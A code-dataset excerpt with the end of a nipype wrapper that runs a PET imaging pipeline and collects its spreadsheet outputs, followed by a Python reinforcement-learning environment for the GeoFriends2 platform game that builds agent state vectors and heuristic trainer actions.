File(desc=\"R1 LRSC spreadsheet (with PVC)\", exists=True)\n\n suvr_xlsx = File(desc=\"SUVR spreadsheet\", exists=True)\n suvr_pvc_xlsx = File(desc=\"SUVR spreadsheet (with PVC)\", exists=True)\n\n ea_xlsx = File(desc=\"EA spreadsheet\", exists=True)\n ea_pvc_xlsx = File(desc=\"EA spreadsheet (with PVC)\", exists=True)\n\n ea_wb_xlsx = File(desc=\"EA wb spreadsheet\", exists=True)\n ea_pvc_wb_xlsx = File(desc=\"EA wb spreadsheet (with PVC)\", exists=True)\n\nclass PipelineWrapper(CommandLine):\n _cmd = 'python /code/pib.py'\n input_spec = PipelineWrapperInputSpec\n output_spec = PipelineWrapperOutputSpec\n\n def _list_outputs(self):\n # one output should be the full path to the SUVR spreadsheet\n outputs = self._outputs().get()\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_workflow','ROImeans_dvr','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['dvr_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No DVR xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_workflow','ROImeans_r1_wlr','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['r1_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No R1 xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_workflow','ROImeans_r1_lrsc','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['r1_lrsc_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No R1 LRSC xlsx found!')\n\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','EA_workflow','ROImeans_EA','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['ea_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No EA xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','EA_workflow','ROImeans_EA_wb','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['ea_wb_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No EA WB xlsx found!')\n\n\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_pvc_workflow','ROImeans_dvr_pvc','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['dvr_pvc_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No DVR PVC xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_pvc_workflow','ROImeans_r1_wlr_pvc','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['r1_pvc_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No R1 PVC xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','kinetic_model_pvc_workflow','ROImeans_r1_lrsc_pvc','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['r1_lrsc_pvc_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No R1 LRSC PVC xlsx found!')\n\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','EA_pvc_workflow','ROImeans_EA_pvc','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['ea_pvc_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No EA PVC xlsx found!')\n\n xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','EA_pvc_workflow','ROImeans_EA_pvc_wb','*.xlsx'))\n if xlsx_list and len(xlsx_list)==1:\n outputs['ea_pvc_wb_xlsx'] = xlsx_list[0]\n else:\n raise ValueError('No EA PVC WB xlsx found!')\n\n\n\n\n suvr_xlsx_list = glob(os.path.join(self.inputs.outputdir,'pib_workflow','SUVR_workflow','ROImeans','*.xlsx'))\n if suvr_xlsx_list and len(suvr_xlsx_list)==1:\n outputs['suvr_xlsx'] = suvr_xlsx_list[0]\n else:\n raise ValueError('No SUVR xlsx found!')\n\n suvr_xlsx_list 
= glob(os.path.join(self.inputs.outputdir,'pib_workflow','SUVR_pvc_workflow','ROImeans_pvc','*.xlsx'))\n if suvr_xlsx_list and len(suvr_xlsx_list)==1:\n outputs['suvr_pvc_xlsx'] = suvr_xlsx_list[0]\n else:\n raise ValueError('No SUVR PVC xlsx found!')\n\n return outputs\n","sub_path":"pib_wrapper.py","file_name":"pib_wrapper.py","file_ext":"py","file_size_in_byte":8118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
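For context, a minimal usage sketch of the nipype interface defined in pib_wrapper.py above; all paths are placeholders, and it assumes the environment (e.g. a container) that provides /code/pib.py:

from pib_wrapper import PipelineWrapper

pib = PipelineWrapper()
pib.inputs.pet4D = '/data/pet4d.nii.gz'          # hypothetical input paths
pib.inputs.pettiming = '/data/timing.csv'
pib.inputs.mri = '/data/mri_brain.nii.gz'
pib.inputs.label = '/data/labels.nii.gz'
pib.inputs.mnitransform = '/data/mri2mni_composite.h5'
pib.inputs.outputdir = '/out'
result = pib.run()                    # shells out to: python /code/pib.py <args>
print(result.outputs.suvr_xlsx)       # collected by _list_outputs() after the run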
+{"seq_id":"322619931","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport socket\nimport math\nimport subprocess\nfrom random import randint, choice\n\nfrom enum import Enum\n\nfrom simulator.GF2 import GF2Sim\n\n\nclass OutputType(Enum):\n FULL = 1\n RETINA = 2\n SIMPLE = 3\n RECT_SIMPLE = 4\n\n\nclass Obstacle(object):\n def __init__(self, center_x, center_y, half_width, half_height):\n self.top_y = center_y - half_height\n self.bot_y = center_y + half_height\n self.left_x = center_x - half_width\n self.right_x = center_x + half_width\n\n self.center_x = center_x\n self.center_y = center_y\n self.width = half_width\n self.height = half_height\n\n def __str__(self):\n return \"*(\" + str(self.left_x) + \",\" + str(self.top_y) + \"):(\" + str(self.right_x) + \",\" + str(\n self.bot_y) + \")*\"\n\n\nclass GymGeoFriends2(object):\n def __init__(self, rect_actions, circle_actions, id_thread, rectangle=False, circle=True):\n self.numberOfActions_rect = rect_actions\n self.numberOfActions_circle = circle_actions\n\n self.debug = False\n self.id = id_thread + 1\n\n self.number_of_rectangle = 1 # number of agents\n self.number_of_circle = 1\n\n self.output_type = OutputType.RECT_SIMPLE\n\n if self.output_type == OutputType.SIMPLE:\n self.width = 2 + 2 + 2 + 5 # walls left and right, speed, closest reward, reward counter, mov counter, jump stats, time\n elif self.output_type == OutputType.RECT_SIMPLE:\n self.width = 9 # closest reward, closest hole, closest wall, width/growing, rewards left\n self.width_circ = 11 # closest reward, closest hole, closest wall, width/growing, rewards left\n elif self.output_type == OutputType.RETINA:\n self.width = 10 + 4 + 3 * 3 # retina\n else:\n self.width = 10 + 4 + 4 * 3 + 1 + 1 + 2 + 1 # points, pos/vel, rewards (pos, dist, existing), reward counter, mov counter, jump stats, time\n\n self.height = 1 # features\n self.input_size = self.width # * self.numberOfMapCells\n self.input_size_circ = self.width_circ\n\n self._screen_rectangle = np.zeros([1, self.input_size])\n self._screen_circle = np.zeros([1, self.input_size_circ])\n\n self.reward_rectangle = 0 # current processed reward\n self.reward_circle = 0\n self.terminal = False # whether simulation is on-going\n self.display = False\n if self.id != 1:\n self.display = False\n\n self.circle = circle\n self.rectangle = rectangle\n\n self.len_points = 10\n self.goingRight = True\n\n # ready game-socket here\n print(self.id)\n if self.circle:\n self.previous_size_circ = -1\n self.previous_leftover_message_circ = ''\n\n if self.rectangle:\n self.previous_size_rect = -1\n self.previous_leftover_message_rect = ''\n\n self.simulator = GF2Sim(gui=self.display)\n\n self.obstacles_circ = None\n self.obstacles_rect = None\n\n self.circle_mov_counter = 0\n self.rectangle_mov_counter = 0\n\n self.prev_map = 4\n\n self.scale_rect_output = np.array([1280, 800, 1280, 800, 1280, 800, 1, 240, 3])\n\n def new_episode(self):\n if self.rectangle and not self.circle:\n map_number = randint(9, 16)\n elif not self.rectangle and self.circle:\n map_number = randint(1, 10)\n else:\n map_number = randint(9, 10)\n self.prev_map = map_number\n\n self.simulator.reset(map_number=map_number, circle=self.circle, rectangle=self.rectangle)\n print(str(self.id) + \" - Starting simulation\")\n\n self.obstacles_circ = list(self.simulator.obstacles)\n self.obstacles_rect = list(self.simulator.obstacles)\n\n self.terminal = False\n self._screen_rectangle = np.zeros([1, self.input_size])\n self._screen_circle = np.zeros([1, 
self.input_size_circ])\n self.reward_rectangle = 0\n self.reward_circle = 0\n\n self.circle_mov_counter = 0\n self.rectangle_mov_counter = 0\n\n return self._screen_rectangle, self._screen_circle, self.reward_rectangle, self.reward_circle, self.terminal\n\n def get_htg_rect(self):\n action_vals = [-1, -1, -1, 0]\n\n reward_above_me = self._screen_rectangle[0][1] - \\\n (self.simulator.rect_max + self.simulator.rect_min - self._screen_rectangle[0][7]) / 2 < 0\n reward_left = self._screen_rectangle[0][0] < 0\n hole_left = self._screen_rectangle[0][3] > 0\n hole_right = self._screen_rectangle[0][5] > 0\n reward_closer_than_hole = (reward_left and self._screen_rectangle[0][0] > self._screen_rectangle[0][2]) or \\\n (not reward_left and self._screen_rectangle[0][0] < self._screen_rectangle[0][4])\n rectangle_larger_than_hole = (reward_left and self._screen_rectangle[0][3] == 0) or \\\n (not reward_left and self._screen_rectangle[0][5] == 0)\n rectangle_growing_side = self._screen_rectangle[0][6]\n\n if reward_above_me:\n if reward_closer_than_hole or rectangle_larger_than_hole:\n if reward_left:\n action_vals[0] = 1\n else:\n action_vals[1] = 1\n if reward_closer_than_hole and rectangle_growing_side: # grow high\n action_vals[2] = 1\n else: # if hole closer than reward and we fall through it, move away from reward\n if reward_left:\n action_vals[1] = 1\n else:\n action_vals[0] = 1\n if not rectangle_growing_side:\n action_vals[2] = 1\n else: # reward below, hole before reward\n if hole_left:\n action_vals[0] = 1\n elif hole_right:\n action_vals[1] = 1\n else:\n action_vals[3] = 1\n\n if rectangle_growing_side:\n action_vals[2] = 1\n\n return action_vals\n\n def get_trainer_action_rectangle(self):\n possibles = [(x, y) for x, y in enumerate(self.get_htg_rect())]\n return choice([a[0] for a in possibles if a[1] == 1])\n\n def get_trainer_action_circle(self):\n possibles = [(x, y) for x, y in enumerate(self.get_htg_circ())]\n return choice([a[0] for a in possibles if a[1] == 1])\n\n def get_htg_circ(self):\n action_vals = [-1, -1, 0]\n\n reward_above_me = self._screen_circle[0][1] - self.simulator.circle_radius < 0\n reward_left = self._screen_circle[0][0] < 0\n\n reward_closer_than_hole = (reward_left and self._screen_circle[0][0] > self._screen_circle[0][2]) or \\\n (not reward_left and self._screen_circle[0][0] < self._screen_circle[0][4])\n circle_jumping = bool(self._screen_circle[0][6])\n if circle_jumping:\n action_vals[2] = -1\n\n if reward_above_me:\n if reward_closer_than_hole:\n if reward_left:\n action_vals[0] = 1\n else:\n action_vals[1] = 1\n if not circle_jumping and abs(self._screen_circle[0][0]) < self.simulator.circle_radius:\n action_vals[2] = 1\n else: # if hole closer than reward, jump over it\n if reward_left:\n action_vals[0] = 1\n if not circle_jumping and self._screen_circle[0][2] > -self.simulator.circle_radius * 2:\n action_vals[2] = 1\n else:\n action_vals[1] = 1\n if not circle_jumping and self._screen_circle[0][4] < self.simulator.circle_radius * 2:\n action_vals[2] = 1\n\n else: # reward below\n # if reward_closer_than_hole:\n if reward_left:\n action_vals[0] = 1\n if not circle_jumping and self._screen_circle[0][2] > -self.simulator.circle_radius * 2:\n action_vals[2] = 1\n else:\n action_vals[1] = 1\n if not circle_jumping and self._screen_circle[0][4] < self.simulator.circle_radius * 2:\n action_vals[2] = 1\n \"\"\"else:\n if (-self._screen_circle[0][2] < self._screen_circle[0][4] and self._screen_circle[0][3] > 40) \\\n or self._screen_circle[0][5] <= 40:\n 
action_vals[0] = 1\n elif (-self._screen_circle[0][2] > self._screen_circle[0][4] and self._screen_circle[0][5] > 40) \\\n or self._screen_circle[0][3] <= 40:\n action_vals[1] = 1\"\"\"\n\n return action_vals\n\n def get_state(self):\n return self._screen_rectangle, self._screen_circle\n\n def is_episode_finished(self):\n return self.terminal\n\n @property\n def screen(self):\n return self._screen_rectangle\n\n @property\n def action_size(self):\n return [self.numberOfActions_rect, self.numberOfActions_circle]\n\n @property\n def lives(self):\n return 1\n\n @property\n def state(self):\n return self._screen_rectangle, self.reward_rectangle, self.terminal\n\n def observe(self):\n time_counter = max(self._screen_circle[0][-1], self._screen_rectangle[0][-1])\n self._screen_rectangle = np.zeros([1, self.input_size])\n self._screen_circle = np.zeros([1, self.input_size_circ])\n self._screen_rectangle[0][-1] = time_counter\n self._screen_circle[0][-1] = time_counter\n\n # STATE = corner points (2*4), floor/ceiling height (2x1), position (2x1), speed (2x1), rewards (2xN), rewards distance (1xN)\n\n terminal_circ, terminal_rect = False, False\n if self.circle:\n terminal_circ = self.circle_output(self.simulator.get_circ_state())\n if self.rectangle:\n terminal_rect = self.rectangle_output(self.simulator.get_rect_state())\n\n self.terminal = terminal_circ or terminal_rect\n\n return self._screen_rectangle / self.scale_rect_output, self._screen_circle, self.reward_rectangle, self.reward_circle, self.terminal\n\n def act(self, actions):\n self.simulator.pass_turn(action_rectangle=actions[0], action_circle=actions[1])\n\n if actions[0] == 1:\n self.rectangle_mov_counter = (\n self.rectangle_mov_counter + 1) if self.rectangle_mov_counter + 1 < 200 else 200\n elif actions[0] == 0:\n self.rectangle_mov_counter = self.rectangle_mov_counter - 1 if self.rectangle_mov_counter - 1 > -200 else -200\n\n if actions[1] == 1:\n self.circle_mov_counter = (self.circle_mov_counter + 1) if self.circle_mov_counter + 1 < 200 else 200\n elif actions[1] == 0:\n self.circle_mov_counter = self.circle_mov_counter - 1 if self.circle_mov_counter - 1 > -200 else -200\n\n def close(self):\n pass\n\n def rectangle_output(self, data):\n # [ closest_reward_x, closest_reward_y,\n # left_hole_x, left_hole_width,\n # right_hole_x, right_hole_width,\n # growing_wide_boolean, width,\n # reward_counter ]\n\n # TODO: maybe for from high to low instead of closest\n my_x = data[0]\n my_y = data[1]\n\n # closest reward\n rwrd1, rwrd2, rwrd3 = (1000, 1000), (1000, 1000), (1000, 1000)\n if len(data) > 4:\n rwrd1 = (data[4] - my_x, data[5] - my_y)\n if len(data) > 6:\n rwrd2 = (data[6] - my_x, data[7] - my_y)\n if len(data) > 8:\n rwrd3 = (data[8] - my_x, data[9] - my_y)\n d1 = math.sqrt(rwrd1[0] ** 2 + rwrd1[1] ** 2)\n d2 = math.sqrt(rwrd2[0] ** 2 + rwrd2[1] ** 2)\n d3 = math.sqrt(rwrd3[0] ** 2 + rwrd3[1] ** 2)\n if d1 < d2 and d1 < d3:\n self._screen_rectangle[0][0], self._screen_rectangle[0][1] = rwrd1[0], rwrd1[1]\n elif d2 < d1 and d2 < d3:\n self._screen_rectangle[0][0], self._screen_rectangle[0][1] = rwrd2[0], rwrd2[1]\n elif d3 < d1 and d3 < d2:\n self._screen_rectangle[0][0], self._screen_rectangle[0][1] = rwrd3[0], rwrd3[1]\n\n # ground holes in both directions\n hole_left, hole_right = self.get_rect_points()\n self._screen_rectangle[0][2] = hole_left[0] - my_x\n self._screen_rectangle[0][3] = 0 if hole_left[1] < data[3] + 20 else 1 # 1 if needs to grow wide\n self._screen_rectangle[0][4] = hole_right[0] - my_x\n 
self._screen_rectangle[0][5] = 0 if hole_right[1] < data[3] + 20 else 1  # 1 if needs to grow wide\n\n        # wall holes in proper direction\n        # _screen[0][4] = 0  # right_down[0] - my_x\n        # _screen[0][5] = 0  # if True else 1  # 1 if needs to grow wide\n\n        # shape\n        self._screen_rectangle[0][6] = data[2]  # growing_wide\n        self._screen_rectangle[0][7] = data[3]  # width\n\n        # reward counter\n        self._screen_rectangle[0][8] = (len(data) - 4) / 2\n\n        self.reward_rectangle = (self.previous_size_rect - len(data)) * 50 if self.previous_size_rect > 0 else 0\n        self.previous_size_rect = len(data)\n        terminal = len(data) == 4\n\n        return terminal
\n\n    def get_rect_points(self):\n        # todo: get index of ground from server, cheatsy doodles\n        ground = self.simulator.rectangle_ground\n\n        # if left:\n        # find closest x-wise obstacle with top<=ground_top and right<=ground_left\n        closest_ground_left = None\n        for obs in self.obstacles_rect:\n            # obstacle below and to the left of current ground\n            # Highest obstacle, if multiple, then the right-most one\n            if ground.top_y <= obs.top_y and obs.right_x < ground.left_x:\n                if closest_ground_left is None or \\\n                        obs.top_y < closest_ground_left.top_y or \\\n                        (closest_ground_left.right_x < obs.right_x and obs.top_y == closest_ground_left.top_y):\n                    closest_ground_left = obs\n\n        if closest_ground_left is not None:\n            # calculate distance between obs_right and ground_left\n            hole_width = ground.left_x - closest_ground_left.right_x\n        else:\n            hole_width = 0\n\n        # return [ground_left, obs_right-ground_left], aka [hole start position, hole width]\n        hole_left = [ground.left_x, hole_width]
\n        # else:\n        # find closest x-wise obstacle with top<=ground_top and ground_right < left\n        closest_ground_right = None\n        for obs in self.obstacles_rect:\n            # obstacle below and to the right of current ground\n            # Highest obstacle, if multiple, then the left-most one\n            if ground.top_y <= obs.top_y and ground.right_x < obs.left_x:\n                if closest_ground_right is None or \\\n                        obs.top_y < closest_ground_right.top_y or \\\n                        (obs.left_x < closest_ground_right.left_x and obs.top_y == closest_ground_right.top_y):\n                    closest_ground_right = obs\n\n        if closest_ground_right is not None:\n            # calculate distance between obs_left and ground_right\n            hole_width = closest_ground_right.left_x - ground.right_x\n        else:\n            hole_width = 0\n\n        # return [ground_right, obs_left-ground_right], aka [hole start position, hole width]\n        hole_right = [ground.right_x, hole_width]\n\n        return hole_left, hole_right
\n\n    def circle_output(self, data):\n        # [ closest_reward_x, closest_reward_y,\n        #   left_hole_x, left_hole_width,\n        #   right_hole_x, right_hole_width,\n        #   jumping boolean, ceiling distance,\n        #   reward_counter ]\n\n        my_x = data[0]\n        my_y = data[1]\n\n        # closest reward\n        rwrd1, rwrd2, rwrd3 = (1000, 1000), (1000, 1000), (1000, 1000)\n        if len(data) > 4:\n            rwrd1 = (data[4] - my_x, data[5] - my_y)\n        if len(data) > 6:\n            rwrd2 = (data[6] - my_x, data[7] - my_y)\n        if len(data) > 8:\n            rwrd3 = (data[8] - my_x, data[9] - my_y)\n        d1 = math.sqrt(rwrd1[0] ** 2 + rwrd1[1] ** 2)\n        d2 = math.sqrt(rwrd2[0] ** 2 + rwrd2[1] ** 2)\n        d3 = math.sqrt(rwrd3[0] ** 2 + rwrd3[1] ** 2)\n        if d1 < d2 and d1 < d3:\n            self._screen_circle[0][0], self._screen_circle[0][1] = rwrd1[0], rwrd1[1]\n        elif d2 < d1 and d2 < d3:\n            self._screen_circle[0][0], self._screen_circle[0][1] = rwrd2[0], rwrd2[1]\n        elif d3 < d1 and d3 < d2:\n            self._screen_circle[0][0], self._screen_circle[0][1] = rwrd3[0], rwrd3[1]
\n\n        # platforms in both directions\n        ground, ceil, left_down, left_up, right_down, right_up = self.get_circ_points(my_x, my_y)\n\n        # if target below, show holes, else show platforms!\n        if self._screen_circle[0][1] < 0:\n            self._screen_circle[0][2] = left_up[0] - my_x\n            self._screen_circle[0][3] = left_up[1] - my_y\n            self._screen_circle[0][4] = right_up[0] - my_x\n            self._screen_circle[0][5] = right_up[1] - my_y\n        else:\n            self._screen_circle[0][2] = left_down[0] - my_x\n            self._screen_circle[0][3] = left_down[1] - my_y\n            self._screen_circle[0][4] = right_down[0] - my_x\n            self._screen_circle[0][5] = right_down[1] - my_y\n\n        # jump\n        self._screen_circle[0][6] = 1 if abs(data[3]) > 0.1 else 0  # jumping\n        self._screen_circle[0][7] = ceil.bot_y - my_y  # ceiling distance\n\n        # SPEEDS\n        self._screen_circle[0][8] = data[2]  # horizontal speed\n        self._screen_circle[0][9] = data[3]  # vertical speed\n\n        # reward counter\n        self._screen_circle[0][10] = (len(data) - 4) / 2\n\n        self.reward_circle = (self.previous_size_circ - len(data)) * 50 if self.previous_size_circ > 0 else 0\n        self.previous_size_circ = len(data)\n        terminal = len(data) == 4\n\n        return terminal
\n\n    def get_circ_points(self, my_x, my_y):\n        # todo: get index of ground from server, cheatsy doodles\n        ground = self.simulator.circle_ground\n        ceil = getObstacleAbovePoint(my_x, my_y, self.obstacles_circ)\n\n        # move left until fall or wall\n        index = -1\n        for i, obs in enumerate(self.obstacles_circ):\n            if ground.left_x <= obs.right_x < my_x and obs.top_y < my_y < ground.top_y <= obs.bot_y:\n                if index == -1 or self.obstacles_circ[index].right_x < obs.right_x:\n                    index = i\n        if index == -1:  # no walls found, there must be something below\n            fallZoneLeft = getObstacleBelowPoint(ground.left_x, ground.top_y, self.obstacles_circ)\n            left_down = (ground.left_x, fallZoneLeft.top_y)\n        else:\n            left_down = (self.obstacles_circ[index].right_x, ground.top_y)
\n\n        index = -1\n        # find any wall to the left\n        for i, obs in enumerate(self.obstacles_circ):\n            if obs.right_x < my_x and obs.top_y < my_y:  # wall to the left\n                if index == -1 or self.obstacles_circ[index].right_x < obs.right_x:  # closest wall\n                    being_blocked = False\n                    for ceiling in self.obstacles_circ:  # nothing blocking the top right corner\n                        if ceiling.left_x < obs.right_x < ceiling.right_x and obs.top_y < ceiling.bot_y < my_y:\n                            being_blocked = True\n                            break\n                    if not being_blocked:\n                        index = i\n        if index == -1:\n            index = 2\n        left_up = (self.obstacles_circ[index].right_x, self.obstacles_circ[index].top_y)
\n\n        # move right until fall or wall\n        index = -1\n        for i, obs in enumerate(self.obstacles_circ):\n            if my_x < obs.left_x <= ground.right_x and obs.top_y < my_y < ground.top_y <= obs.bot_y:\n                if index == -1 or obs.left_x < self.obstacles_circ[index].left_x:\n                    index = i\n        if index == -1:  # no walls found, there must be something below\n            fallZoneRight = getObstacleBelowPoint(ground.right_x, ground.top_y, self.obstacles_circ)\n            right_down = (ground.right_x, fallZoneRight.top_y)\n        else:\n            right_down = (self.obstacles_circ[index].left_x, ground.top_y)
\n\n        index = -1\n        for i, obs in enumerate(self.obstacles_circ):\n            if my_x < obs.left_x and obs.top_y < my_y:  # wall to the right\n                if index == -1 or obs.left_x < self.obstacles_circ[index].left_x:  # closest wall\n                    being_blocked = False\n                    for ceiling in self.obstacles_circ:  # nothing blocking the top left corner\n                        if ceiling.left_x < obs.left_x < ceiling.right_x and obs.top_y < ceiling.bot_y < my_y:\n                            being_blocked = True\n                            break\n                    if not being_blocked:\n                        index = i\n        if index == -1:\n            index = 3\n        right_up = (self.obstacles_circ[index].left_x, self.obstacles_circ[index].top_y)
\n\n        return ground, ceil, left_down, left_up, right_down, right_up\n\n        # return hole_left, hole_right
\n\n\ndef readSocketInput(simulator, _screen, reward, terminal, obstacles, previous_size, len_points, data, move_counter=0,\n                    output_type=OutputType.FULL):\n    # STATE = corner points (2*4), position (2x1), speed (2x1), rewards (2xN), dists (N), exist (N), counter (1)\n\n    if len(data) == 4:  # number of circle info points\n        terminal = True\n        # print(\"Terminal\")\n\n    if output_type == OutputType.RETINA:\n        ground, ceil, \\\n            (_screen[0][0], _screen[0][1]), \\\n            (_screen[0][2], _screen[0][3]), \\\n            (_screen[0][4], _screen[0][5]), \\\n            (_screen[0][6], _screen[0][7]) = getPoints(float(data[0]), float(data[1]), obstacles)\n\n        _screen[0][8] = ground.top_y\n        _screen[0][9] = ceil.bot_y\n\n        # convert input into screen\n        for i in range(len(data)):\n            try:\n                _screen[0][i + len_points] = float(data[i])\n            except:\n                print(\":\" + data[i] + \": \" + str(data))\n\n        # if previous_size > 0 and previous_size - len(data)>0:\n        #     print(\"RAW\",_screen)\n\n        # make things relative by subtracting (x,y) (indexes 8,9) from them\n        for i in range(len_points - 2):\n            _screen[0][i] = _screen[0][i] - _screen[0][len_points + i % 2]\n        for i in range(len_points - 2, len_points):\n            _screen[0][i] = _screen[0][i] - _screen[0][len_points + 1]\n        for i in range(4 + len_points, len(data) + len_points):\n            _screen[0][i] = _screen[0][i] - _screen[0][len_points + i % 2]\n\n        # replicate missing rewards\n        if len(data) > 4:\n            for i in range(len(data) + len_points, len(_screen[0]) - 3):\n                _screen[0][i] = _screen[0][4 + len_points + i % (len(data) - 4)]\n\n        # calculate distances\n        _screen[0][20] = math.sqrt(_screen[0][14] ** 2 + _screen[0][15] ** 2)\n        _screen[0][21] = math.sqrt(_screen[0][16] ** 2 + _screen[0][17] ** 2)\n        _screen[0][22] = math.sqrt(_screen[0][18] ** 2 + _screen[0][19] ** 2)
\n\n    elif output_type == OutputType.SIMPLE:\n        # walls left and right\n        ground, ceil, left_down, left_up, right_down, right_up = getPoints(float(data[0]), float(data[1]), obstacles)\n        _screen[0][0] = left_down[0] - float(data[0])\n        _screen[0][1] = right_down[0] - float(data[0])\n\n        # speed\n        _screen[0][2] = float(data[2])\n        _screen[0][3] = float(data[3])\n\n        # closest reward\n        rwrd1, rwrd2, rwrd3 = (1000, 1000), (1000, 1000), (1000, 1000)\n        if len(data) > 4:\n            rwrd1 = (float(data[4]) - float(data[0]), float(data[5]) - float(data[1]))\n        if len(data) > 6:\n            rwrd2 = (float(data[6]) - float(data[0]), float(data[7]) - float(data[1]))\n        if len(data) > 8:\n            rwrd3 = (float(data[8]) - float(data[0]), float(data[9]) - float(data[1]))\n        d1 = math.sqrt(rwrd1[0] ** 2 + rwrd1[1] ** 2)\n        d2 = math.sqrt(rwrd2[0] ** 2 + rwrd2[1] ** 2)\n        d3 = math.sqrt(rwrd3[0] ** 2 + rwrd3[1] ** 2)\n        if d1 < d2 and d1 < d3:\n            _screen[0][4], _screen[0][5] = float(data[4]) - float(data[0]), float(data[5]) - float(data[1])\n        elif d2 < d1 and d2 < d3:\n            _screen[0][4], _screen[0][5] = float(data[6]) - float(data[0]), float(data[7]) - float(data[1])\n        elif d3 < d1 and d3 < d2:\n            _screen[0][4], _screen[0][5] = float(data[8]) - float(data[0]), float(data[9]) - float(data[1])\n\n        # reward counter\n        _screen[0][6] = (len(data) - 4) / 2\n\n        # move counter, jump stats, time\n        _screen[0][7] = 0  # move_counter (disabled)\n        _screen[0][8] = 1 if (ground.top_y - float(data[1])) > 41 else 0\n        _screen[0][9] = 1 if (ceil.bot_y - float(data[1])) < -326 else 0\n        _screen[0][10] = _screen[0][10] + 1
\n\n    else:\n        ground, ceil, \\\n            (_screen[0][0], _screen[0][1]), \\\n            (_screen[0][2], _screen[0][3]), \\\n            (_screen[0][4], _screen[0][5]), \\\n            (_screen[0][6], _screen[0][7]) = getPoints(float(data[0]), float(data[1]), obstacles)\n\n        _screen[0][8] = ground.top_y\n        _screen[0][9] = ceil.bot_y\n\n        # convert input into screen\n        for i in range(len(data)):\n            try:\n                _screen[0][i + len_points] = float(data[i])\n            except:\n                print(\":\" + data[i] + \": \" + str(data))\n\n        # if previous_size > 0 and previous_size - len(data)>0:\n        #     print(\"RAW\",_screen)\n\n        # make things relative by subtracting (x,y) (indexes 8,9) from them\n        for i in range(len_points - 2):\n            _screen[0][i] = _screen[0][i] - _screen[0][len_points + i % 2]\n        for i in range(len_points - 2, len_points):\n            _screen[0][i] = _screen[0][i] - _screen[0][len_points + 1]\n        for i in range(4 + len_points, len(data) + len_points):\n            _screen[0][i] = _screen[0][i] - _screen[0][len_points + i % 2]\n\n        # calculate distances\n        _screen[0][20] = math.sqrt(_screen[0][14] ** 2 + _screen[0][15] ** 2)\n        _screen[0][21] = math.sqrt(_screen[0][16] ** 2 + _screen[0][17] ** 2)\n        _screen[0][22] = math.sqrt(_screen[0][18] ** 2 + _screen[0][19] ** 2)\n\n        # binary: reward exists?\n        _screen[0][23] = 1 if len(data) > 4 else 0\n        _screen[0][24] = 1 if len(data) > 6 else 0\n        _screen[0][25] = 1 if len(data) > 8 else 0\n\n        # reward counter\n        _screen[0][26] = _screen[0][23] + _screen[0][24] + _screen[0][25]\n\n        _screen[0][27] = move_counter  # move counter\n        _screen[0][28] = 1 if _screen[0][8] > 41 else 0  # is jumping\n        _screen[0][29] = 1 if _screen[0][9] < -326 else 0  # can jump\n        _screen[0][30] = _screen[0][30] + 1  # time counter\n\n        # turn leftover space in screen to 0s\n        # for i in range(len(data) + 8, len(self._screen_circle[0])):\n        #     self._screen_circle[0][i] = 0\n        #     self._screen_circle[0][i] = 1000  # also could be turn to 1000 with relative distances\n\n    # positive reward when data decreases (because a collectible was caught)\n    if previous_size > 0:\n        reward = (previous_size - len(data)) * 50\n    previous_size = len(data)\n\n    return _screen, reward, terminal, previous_size
\n\n\ndef getObstacleBelowPoint(my_x, my_y, obstacles):\n    index = 0  # default ground\n    for i, obs in enumerate(obstacles):\n        if obs.left_x < my_x < obs.right_x and my_y < obs.top_y < obstacles[index].top_y:\n            index = i\n    return obstacles[index]\n\n\ndef getObstacleAbovePoint(my_x, my_y, obstacles):\n    index = 1  # default ceiling\n    for i, obs in enumerate(obstacles):\n        if obs.left_x < my_x < obs.right_x and my_y > obs.bot_y > obstacles[index].bot_y:\n            index = i\n    return obstacles[index]
\n\n\ndef getPoints(my_x, my_y, obstacles):\n    # get ground obstacle below circle\n    ground = getObstacleBelowPoint(my_x, my_y, obstacles)\n    ceil = getObstacleAbovePoint(my_x, my_y, obstacles)\n\n    # move left until fall or wall\n    index = -1\n    for i, obs in enumerate(obstacles):\n        if ground.left_x <= obs.right_x < my_x and obs.top_y < my_y < ground.top_y <= obs.bot_y:\n            if index == -1 or obstacles[index].right_x < obs.right_x:\n                index = i\n    if index == -1:  # no walls found, there must be something below\n        fallZoneLeft = getObstacleBelowPoint(ground.left_x, ground.top_y, obstacles)\n        left_down = (ground.left_x, fallZoneLeft.top_y)\n    else:\n        left_down = (obstacles[index].right_x, ground.top_y)\n\n    index = -1\n    # find any wall to the left\n    for i, obs in enumerate(obstacles):\n        if obs.right_x < my_x and obs.top_y < my_y:  # wall to the left\n            if index == -1 or obstacles[index].right_x < obs.right_x:  # closest 